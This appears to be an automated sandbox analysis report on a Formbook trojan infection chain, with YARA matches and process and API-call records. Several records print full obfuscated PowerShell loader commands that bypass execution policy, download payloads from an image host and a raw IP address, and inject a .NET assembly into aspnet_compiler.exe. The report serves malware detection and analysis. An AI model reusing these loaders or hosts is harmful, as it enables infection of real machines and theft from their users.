Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6084, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0042BDA3 NtClose,	11_2_0042BDA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F535C0 NtCreateMutant,LdrInitializeThunk,	11_2_00F535C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52B60 NtClose,LdrInitializeThunk,	11_2_00F52B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_00F52C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_00F52DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F53090 NtSetValueKey,	11_2_00F53090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F53010 NtOpenDirectoryObject,	11_2_00F53010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F54340 NtSetContextThread,	11_2_00F54340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F54650 NtSuspendThread,	11_2_00F54650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F539B0 NtGetContextThread,	11_2_00F539B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52AF0 NtWriteFile,	11_2_00F52AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52AD0 NtReadFile,	11_2_00F52AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52AB0 NtWaitForSingleObject,	11_2_00F52AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52BF0 NtAllocateVirtualMemory,	11_2_00F52BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52BE0 NtQueryValueKey,	11_2_00F52BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52BA0 NtEnumerateValueKey,	11_2_00F52BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52B80 NtQueryInformationFile,	11_2_00F52B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52CF0 NtOpenProcess,	11_2_00F52CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52CC0 NtQueryVirtualMemory,	11_2_00F52CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52CA0 NtQueryInformationToken,	11_2_00F52CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52C60 NtCreateKey,	11_2_00F52C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52C00 NtQueryInformationProcess,	11_2_00F52C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52DD0 NtDelayExecution,	11_2_00F52DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52DB0 NtEnumerateKey,	11_2_00F52DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F53D70 NtOpenThread,	11_2_00F53D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52D30 NtUnmapViewOfSection,	11_2_00F52D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52D10 NtMapViewOfSection,	11_2_00F52D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F53D10 NtOpenProcessToken,	11_2_00F53D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52D00 NtSetInformationFile,	11_2_00F52D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52EE0 NtQueueApcThread,	11_2_00F52EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52EA0 NtAdjustPrivilegesToken,	11_2_00F52EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52E80 NtReadVirtualMemory,	11_2_00F52E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52E30 NtWriteVirtualMemory,	11_2_00F52E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52FE0 NtCreateFile,	11_2_00F52FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52FB0 NtResumeThread,	11_2_00F52FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52FA0 NtQuerySection,	11_2_00F52FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52F90 NtProtectVirtualMemory,	11_2_00F52F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52F60 NtCreateProcessEx,	11_2_00F52F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F52F30 NtCreateSection,	11_2_00F52F30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_028C7638	7_2_028C7638
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_028CB870	7_2_028CB870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_028C5425	7_2_028C5425
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401000	11_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040F803	11_2_0040F803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004160B3	11_2_004160B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401260	11_2_00401260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040FA23	11_2_0040FA23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402ADD	11_2_00402ADD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402AE0	11_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040DAA3	11_2_0040DAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402340	11_2_00402340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0042E333	11_2_0042E333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402334	11_2_00402334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402E70	11_2_00402E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040F7FA	11_2_0040F7FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD70E9	11_2_00FD70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDF0E0	11_2_00FDF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FCF0CC	11_2_00FCF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD81CC	11_2_00FD81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2B1B0	11_2_00F2B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE01AA	11_2_00FE01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0F172	11_2_00F0F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FEB16B	11_2_00FEB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F5516C	11_2_00F5516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBA118	11_2_00FBA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F10100	11_2_00F10100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FC12ED	11_2_00FC12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3B2C0	11_2_00F3B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F252A0	11_2_00F252A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FC0274	11_2_00FC0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2E3F0	11_2_00F2E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE03E6	11_2_00FE03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F6739A	11_2_00F6739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDA352	11_2_00FDA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0D34C	11_2_00F0D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD132D	11_2_00FD132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FCE4F6	11_2_00FCE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F11460	11_2_00F11460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD2446	11_2_00FD2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDF43F	11_2_00FDF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FBD5B0	11_2_00FBD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE0591	11_2_00FE0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD7571	11_2_00FD7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F20535	11_2_00F20535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3C6E0	11_2_00F3C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD16CC	11_2_00FD16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1C7C0	11_2_00F1C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FDF7B0	11_2_00FDF7B0
